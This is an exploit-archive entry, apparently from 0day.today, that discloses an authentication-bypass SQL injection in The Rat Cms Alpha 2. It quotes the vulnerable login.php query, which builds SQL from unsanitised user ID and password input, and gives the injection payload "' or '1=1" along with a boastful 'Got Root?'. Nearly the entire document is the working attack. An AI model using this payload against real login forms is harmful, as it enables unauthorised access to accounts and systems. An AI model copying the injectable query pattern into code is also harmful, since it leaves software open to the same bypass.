id: 4466
date: 12/15/2008
title: The Rat Cms Alpha 2 (Auth Bypass) SQL Injection Vulnerability
author: x0r
cves: 

=============================================================
The Rat Cms Alpha 2 (Auth Bypass) SQL Injection Vulnerability
=============================================================


---------------------------------
The Rat Cms Auth By Pass
---------------------------------
Autore: x0r
--------------------------------
Bug In: \login.php

	$sql = "SELECT user_id 
	        FROM tbl_auth_user
			WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
			
$result = mysql_query($sql) or die('Query failed. ' . mysql_error()); 

Exploit: ' or '1=1

^^ Got Root?



#  0day.today [2023-03-24]  #